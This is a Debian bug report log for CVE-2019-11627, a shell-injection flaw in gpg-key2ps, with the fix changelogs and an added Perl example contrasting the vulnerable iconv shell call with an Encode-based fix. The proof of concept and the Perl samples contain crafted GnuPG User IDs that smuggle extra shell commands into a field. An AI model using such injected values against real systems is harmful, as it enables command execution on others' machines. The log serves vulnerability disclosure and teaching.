gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering

Related Vulnerabilities: CVE-2019-11627, CVE-2018-15599

Debian Bug report logs - #928256
gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering


Reported by: Guilhem Moulin <guilhem@debian.org>

Date: Tue, 30 Apr 2019 17:48:04 UTC

Severity: important

Tags: security

Found in versions signing-party/2.9-1, signing-party/2.5-1, signing-party/1.1-1

Fixed in versions signing-party/1.1.10-3+deb8u1, signing-party/2.5-1+deb9u1, signing-party/2.10-1, signing-party/2.10-2

Done: Guilhem Moulin <guilhem@debian.org>



Report forwarded to debian-bugs-dist@lists.debian.org:
Bug#928256; Package signing-party. (Tue, 30 Apr 2019 17:48:06 GMT)


Acknowledgement sent to Guilhem Moulin <guilhem@debian.org>:
New Bug report received and forwarded. (Tue, 30 Apr 2019 17:48:06 GMT)


Message #5 received at submit@bugs.debian.org:

From: Guilhem Moulin <guilhem@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: gpg-key2ps: Shell injection vulnerability in UIDs rendering
Date: Tue, 30 Apr 2019 19:45:42 +0200
[Message part 1 (text/plain, inline)]
Package: signing-party
Version: 1.1-1
Severity: important
Tags: security
File: /usr/bin/gpg-key2ps

Stefan `Sec` Zehl discovered an unsafe shell call in gpg-key2ps(1),
enabling shell injection in User-IDs:

    $ export GNUPGHOME="$(mktemp --tmpdir --directory)"
    $ gpg --passphrase "" --batch --quick-gen-key 'foo"; echo pwned $USER >>/tmp/pwned; echo "bar <user1@example.net>'
    $ gpg --passphrase "" --batch --quick-gen-key 'foo `date >>/tmp/pwned` bar <user2@example.net>'
    $ gpg-key2ps user1@example.net user2@example.net >/dev/null
    $ cat /tmp/pwned 
    pwned guilhem
    Tue Apr 30 19:42:48 CEST 2019

-- 
Guilhem.
[signature.asc (application/pgp-signature, inline)]

Marked as found in versions signing-party/2.5-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 30 Apr 2019 19:09:02 GMT)


Marked as found in versions signing-party/2.9-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 30 Apr 2019 19:09:03 GMT)


Added tag(s) pending. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Tue, 30 Apr 2019 19:21:09 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Guilhem Moulin <guilhem@debian.org>:
Bug#928256; Package signing-party. (Wed, 01 May 2019 06:15:03 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Guilhem Moulin <guilhem@debian.org>. (Wed, 01 May 2019 06:15:03 GMT)


Message #16 received at 928256@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Guilhem Moulin <guilhem@debian.org>, 928256@bugs.debian.org
Subject: Re: Bug#928256: gpg-key2ps: Shell injection vulnerability in UIDs rendering
Date: Wed, 1 May 2019 08:13:45 +0200
Control: retitle -1 gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering

On Tue, Apr 30, 2019 at 07:45:42PM +0200, Guilhem Moulin wrote:
> Package: signing-party
> Version: 1.1-1
> Severity: important
> Tags: security
> File: /usr/bin/gpg-key2ps
> 
> Stefan `Sec` Zehl discovered an unsafe shell call in gpg-key2ps(1),
> enabling shell injection in User-IDs:
> 
>     $ export GNUPGHOME="$(mktemp --tmpdir --directory)"
>     $ gpg --passphrase "" --batch --quick-gen-key 'foo"; echo pwned $USER >>/tmp/pwned; echo "bar <user1@example.net>'
>     $ gpg --passphrase "" --batch --quick-gen-key 'foo `date >>/tmp/pwned` bar <user2@example.net>'
>     $ gpg-key2ps user1@example.net user2@example.net >/dev/null
>     $ cat /tmp/pwned 
>     pwned guilhem
>     Tue Apr 30 19:42:48 CEST 2019

CVE-2019-11627 assigned by MITRE.

Regards,
Salvatore



Changed Bug title to 'gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering' from 'gpg-key2ps: Shell injection vulnerability in UIDs rendering'. Request was from Salvatore Bonaccorso <carnil@debian.org> to 928256-submit@bugs.debian.org. (Wed, 01 May 2019 06:15:03 GMT)


Reply sent to Guilhem Moulin <guilhem@debian.org>:
You have taken responsibility. (Wed, 01 May 2019 10:51:07 GMT)


Notification sent to Guilhem Moulin <guilhem@debian.org>:
Bug acknowledged by developer. (Wed, 01 May 2019 10:51:07 GMT)


Message #23 received at 928256-close@bugs.debian.org:

From: Guilhem Moulin <guilhem@debian.org>
To: 928256-close@bugs.debian.org
Subject: Bug#928256: fixed in signing-party 2.10-1
Date: Wed, 01 May 2019 10:48:47 +0000
Source: signing-party
Source-Version: 2.10-1

We believe that the bug you reported is fixed in the latest version of
signing-party, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 928256@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Guilhem Moulin <guilhem@debian.org> (supplier of updated signing-party package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 01 May 2019 12:21:59 +0200
Source: signing-party
Architecture: source
Version: 2.10-1
Distribution: unstable
Urgency: high
Maintainer: Guilhem Moulin <guilhem@debian.org>
Changed-By: Guilhem Moulin <guilhem@debian.org>
Closes: 928256
Changes:
 signing-party (2.10-1) unstable; urgency=high
 .
   * gpg-key2ps: Security fix for CVE-2018-15599: unsafe shell call enabling
     shell injection via a User ID.  Use Perl's (core) module Encode.pm instead
     of shelling out to `iconv`. (Closes: #928256.)
Checksums-Sha1:
 a000ee2d86d2a7ddd0b45c366284b59faf3a1e2c 1953 signing-party_2.10-1.dsc
 6baf98f21af48b3aa5b5d26a41c4a87646b7ee94 222778 signing-party_2.10.orig.tar.gz
 ad8d291f46b3a2899e3e92f26bcb5033c80e45ea 20812 signing-party_2.10-1.debian.tar.xz
 ad05c4707b33e33c4a42864a321efaa6f748da36 6525 signing-party_2.10-1_amd64.buildinfo
Checksums-Sha256:
 3e4cc0273071e358c397b6f2bb05abee0c94a01a5c88b718df97de5826764b3e 1953 signing-party_2.10-1.dsc
 e19416cbd2bc723593334e2471d311f413794faa751b8b2e452e0792fc0431eb 222778 signing-party_2.10.orig.tar.gz
 c8ddc1e0873d072c375787d7b992cfad585d873ada2ecf129741afbd7271be03 20812 signing-party_2.10-1.debian.tar.xz
 57216c034f7c9632262e31c7b5b774aa1df45a80b808d3654ee1764f7805a8c8 6525 signing-party_2.10-1_amd64.buildinfo
Files:
 c2b47c9762a838504bb7da03de99e052 1953 misc optional signing-party_2.10-1.dsc
 9a8861395a81164067a6d88a34f029dd 222778 misc optional signing-party_2.10.orig.tar.gz
 50ec0ea54d6a08ae56d0d3a4de088e04 20812 misc optional signing-party_2.10-1.debian.tar.xz
 04912484f76a9fe2eb51baf0977c78ba 6525 misc optional signing-party_2.10-1_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEERpy6p3b9sfzUdbME05pJnDwhpVIFAlzJc+wACgkQ05pJnDwh
pVLKVQ/+PIWN+aH30cXycMfpFQ3nqlL7hy1EoiUH5nUNQ9xinoN+IYScBYM3a/Vh
ny2IQiChbE57NsZO7c+ZxG0eX+i4WkIwDcxj37nZ94C4o29N83Gu0gYy/syaevs6
AXQ9YRLnCjQvuVJOaKnIwcOhJoWsHf4dLQcEJzitEcGda98LUSG87nManTa7yUVV
WBVpazaw4WaFZjbJclXeHtFLM1aaJnSUGCH/drCj74kqRdT56pcsi56m/oG8bVmC
iiezgopxDarZDL+L8khWComyWyWUWkvbN63csTerombtNKKZ3pfkvJDTWDgyPA0G
x0xtqdF2RM5oY+EcPGh4IrNWvY2c1RgghD3+B2+0lKETI7fU4gn5BaFol99bRzi9
RAeVYDWcpFQ/WHVPfFgSxw6Hi1MyuDskmAtxgjdrVApXK5UUE0UxeAdtY+yjfZ1P
Xj58xsPI1UOW3oIEb05EEoEVYMmr2ET3tnfUsScdmOkLs6MiUfP/vBIs8C3ekh6v
XzcRAR3j/9z5ODOE74Qh4FSFtgyxwEYZnIlpX4ct+q3OaVOUeaM6lGk/NmGawK2d
VgMxWJ+aN958yCWvfhrV1gjYUj7X48k+/Tcqh4Ns318647gox/xgF9hDqyJVMN3U
gbJisOKZnbGZQ0ZAjr3GnIMXO0hq5/GUbUqkuGuwCm4Gy1vnsiQ=
=EhYm
-----END PGP SIGNATURE-----
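The Perl program below is an added example written for this page; it is not code from signing-party or from this bug log. It puts the vulnerable pattern the report and the changelog describe (a User ID interpolated into a shell command line that pipes through `iconv`) next to a fixed conversion that goes through Perl's core Encode module, which is the approach the 2.10 changelog names. The function names, the exact command string and the three sample User IDs are assumptions constructed for the demonstration; the first two samples mirror the PoC in the report. (The 2.10-1 changelog cites CVE-2018-15599; the 2.10-2 upload corrected the identifier to CVE-2019-11627, the fix itself being the same.)

```perl
#!/usr/bin/perl
# Added example, not gpg-key2ps's own code: the shell-injection pattern that
# CVE-2019-11627 describes (a User ID interpolated into a shell command that
# pipes through iconv), next to a fix in the spirit of the 2.10 changelog,
# which converts the charset in-process with the core Encode module.
use strict;
use warnings;
use Encode qw(decode encode FB_CROAK FB_DEFAULT);

# Constructed User IDs, modelled on the PoC in the report.  The first one ends
# the shell's double-quoted string and smuggles in a second command; the
# second one uses backticks, which /bin/sh expands even inside double quotes.
# The third is a benign UTF-8 UID ("Jos\x{e9} \x{20ac}") that needs real
# charset conversion, which is the only job the iconv call ever had.
my @uids = (
    'foo"; echo pwned >>/tmp/pwned; echo "bar <user1@example.net>',
    'foo `date >>/tmp/pwned` bar <user2@example.net>',
    "Jos\xC3\xA9 \xE2\x82\xAC <user3\@example.net>",
);

# VULNERABLE pattern (illustrative, not the script's literal line): the UID is
# pasted into a command string that the backtick operator hands to /bin/sh -c.
# This function only builds the string; it never executes it.
sub unsafe_iconv_command {
    my ($uid, $charset) = @_;
    my $cmd = qq{echo "$uid" | iconv -f utf-8 -t $charset};
    # The vulnerable code would then do:  my $out = `$cmd`;
    return $cmd;
}

# FIXED pattern: decode the UTF-8 bytes gpg emits, then encode for the target
# charset, all in Perl.  No shell runs, so quotes and backticks in the UID are
# just characters.  FB_CROAK dies on malformed UTF-8 instead of guessing;
# FB_DEFAULT substitutes '?' for characters the target charset lacks.
sub uid_to_charset {
    my ($uid_bytes, $charset) = @_;
    my $text = decode('UTF-8', $uid_bytes, FB_CROAK);
    return encode($charset, $text, FB_DEFAULT);
}

for my $uid (@uids) {
    print "UID:          $uid\n";
    print "would run:    ", unsafe_iconv_command($uid, 'latin1'), "\n";
    print "safe latin1:  ", uid_to_charset($uid, 'iso-8859-1'), "\n\n";
}
```

Run it with `perl` and compare the two lines per UID: for the first two samples the command string is exactly what `/bin/sh` would have executed on the victim's machine, while the Encode path returns the UID bytes unchanged; for the third sample the Encode path yields `Jos\xE9 ? <user3@example.net>`, the one thing the external `iconv` call was actually there to do. If an external tool really is needed, the list form of `system`/`open` (`system('iconv', '-f', 'utf-8', '-t', $charset)` with the data fed on stdin) bypasses the shell altogether; removing the process entirely, as the fix does, is simpler and removes the attack surface for good.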




Marked as fixed in versions 1.1.10-3+deb8u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Wed, 01 May 2019 17:57:03 GMT)


No longer marked as fixed in versions 1.1.10-3+deb8u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Wed, 01 May 2019 18:03:03 GMT)


Marked as fixed in versions signing-party/1.1.10-3+deb8u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Wed, 01 May 2019 18:03:04 GMT)


Reply sent to Guilhem Moulin <guilhem@debian.org>:
You have taken responsibility. (Sun, 05 May 2019 13:36:08 GMT)


Notification sent to Guilhem Moulin <guilhem@debian.org>:
Bug acknowledged by developer. (Sun, 05 May 2019 13:36:08 GMT)


Message #34 received at 928256-close@bugs.debian.org:

From: Guilhem Moulin <guilhem@debian.org>
To: 928256-close@bugs.debian.org
Subject: Bug#928256: fixed in signing-party 2.10-2
Date: Sun, 05 May 2019 13:33:32 +0000
Source: signing-party
Source-Version: 2.10-2

We believe that the bug you reported is fixed in the latest version of
signing-party, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 928256@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Guilhem Moulin <guilhem@debian.org> (supplier of updated signing-party package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sun, 05 May 2019 15:13:54 +0200
Source: signing-party
Architecture: source
Version: 2.10-2
Distribution: unstable
Urgency: high
Maintainer: Guilhem Moulin <guilhem@debian.org>
Changed-By: Guilhem Moulin <guilhem@debian.org>
Closes: 928256
Changes:
 signing-party (2.10-2) unstable; urgency=high
 .
   * gpg-key2ps: Security fix for CVE-2019-11627: unsafe shell call enabling
     shell injection via a User ID.  Use Perl's (core) module Encode.pm instead
     of shelling out to `iconv`. (Closes: #928256.)
Checksums-Sha1:
 cbfe0e33d310f4e460b0524326cb3565a03236df 1953 signing-party_2.10-2.dsc
 6baf98f21af48b3aa5b5d26a41c4a87646b7ee94 222778 signing-party_2.10.orig.tar.gz
 1cd39383e45d69553c553667541b5bcfba243d26 20820 signing-party_2.10-2.debian.tar.xz
 fa5a9caff60e2ca4e5cf8abccaa5f852b0b3bcc1 6603 signing-party_2.10-2_amd64.buildinfo
Checksums-Sha256:
 28701115b3339520f31da472f68b35876a8c1688c55dbadf896a1aac446c87ff 1953 signing-party_2.10-2.dsc
 e19416cbd2bc723593334e2471d311f413794faa751b8b2e452e0792fc0431eb 222778 signing-party_2.10.orig.tar.gz
 05e133cc1a941b6676487c0e91fb60b70e2417f81843aa41245855ccc8de6c97 20820 signing-party_2.10-2.debian.tar.xz
 61d677ddf41f3671eac53a8e5c325223de6f421be5f687882fa7ea65fefd7172 6603 signing-party_2.10-2_amd64.buildinfo
Files:
 812c243be9fe08204913c72852b5b6cb 1953 misc optional signing-party_2.10-2.dsc
 9a8861395a81164067a6d88a34f029dd 222778 misc optional signing-party_2.10.orig.tar.gz
 cb7b6cdcc5906a0148c9f9447ed137b8 20820 misc optional signing-party_2.10-2.debian.tar.xz
 4bf57883d80e4b193a480d63006aaf3e 6603 misc optional signing-party_2.10-2_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----
[signature data elided]
-----END PGP SIGNATURE-----




Marked as fixed in versions 1.1.10-3+deb8u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Mon, 03 Jun 2019 16:21:03 GMT)


Marked as fixed in versions signing-party/2.5-1+deb9u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Mon, 03 Jun 2019 16:24:01 GMT)


No longer marked as fixed in versions signing-party/1.1.10-3+deb8u1 and 1.1.10-3+deb8u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Mon, 03 Jun 2019 16:27:04 GMT)


Marked as fixed in versions signing-party/1.1.10-3+deb8u1. Request was from Guilhem Moulin <guilhem@debian.org> to control@bugs.debian.org. (Mon, 03 Jun 2019 16:33:12 GMT)


Reply sent to Guilhem Moulin <guilhem@debian.org>:
You have taken responsibility. (Sat, 08 Jun 2019 17:36:12 GMT)


Notification sent to Guilhem Moulin <guilhem@debian.org>:
Bug acknowledged by developer. (Sat, 08 Jun 2019 17:36:12 GMT)


Message #47 received at 928256-close@bugs.debian.org:

From: Guilhem Moulin <guilhem@debian.org>
To: 928256-close@bugs.debian.org
Subject: Bug#928256: fixed in signing-party 2.5-1+deb9u1
Date: Sat, 08 Jun 2019 17:32:26 +0000
Source: signing-party
Source-Version: 2.5-1+deb9u1

We believe that the bug you reported is fixed in the latest version of
signing-party, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 928256@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Guilhem Moulin <guilhem@debian.org> (supplier of updated signing-party package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 01 May 2019 12:55:42 +0200
Source: signing-party
Binary: signing-party
Architecture: source
Version: 2.5-1+deb9u1
Distribution: stretch
Urgency: medium
Maintainer: Guilhem Moulin <guilhem@debian.org>
Changed-By: Guilhem Moulin <guilhem@debian.org>
Description:
 signing-party - Various OpenPGP related tools
Closes: 928256
Changes:
 signing-party (2.5-1+deb9u1) stretch; urgency=medium
 .
   * Backport security fix for CVE-2019-11627: unsafe shell call enabling shell
     injection via a User ID.  Use Perl's (core) module Encode.pm instead of
     shelling out to `iconv`. (Closes: #928256.)
Checksums-Sha1:
 dc4ac1cdec8e3e7863577f7436f92812339c947e 1983 signing-party_2.5-1+deb9u1.dsc
 c8b0852484ecf8b786be0d780a8750d473aef6eb 20220 signing-party_2.5-1+deb9u1.debian.tar.xz
 63b84f61f1c297fa22a5dc888da4ed1be14c51d2 6872 signing-party_2.5-1+deb9u1_amd64.buildinfo
Checksums-Sha256:
 00cd0e25c88df8a2f5142b6f2f1a25e5c0b4e92aa78ef2245d662fb259448cc4 1983 signing-party_2.5-1+deb9u1.dsc
 5634b87ab930b088be6f49de76b256025e74430f0925bc10f28c451ff1e1cbf0 20220 signing-party_2.5-1+deb9u1.debian.tar.xz
 676392de516b75506e383d9055c379f3852ca9c9d511b105de30efc1117df6f7 6872 signing-party_2.5-1+deb9u1_amd64.buildinfo
Files:
 2a3c4e3072e621fa853321a38468e9a1 1983 misc extra signing-party_2.5-1+deb9u1.dsc
 3e43828793e299362a1e9be8fa2fbca8 20220 misc extra signing-party_2.5-1+deb9u1.debian.tar.xz
 1ca7d4abedb08c2fb8ddbde6fa900ca2 6872 misc extra signing-party_2.5-1+deb9u1_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----
[signature data elided]
-----END PGP SIGNATURE-----






Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:40:49 2019; Machine Name: beach
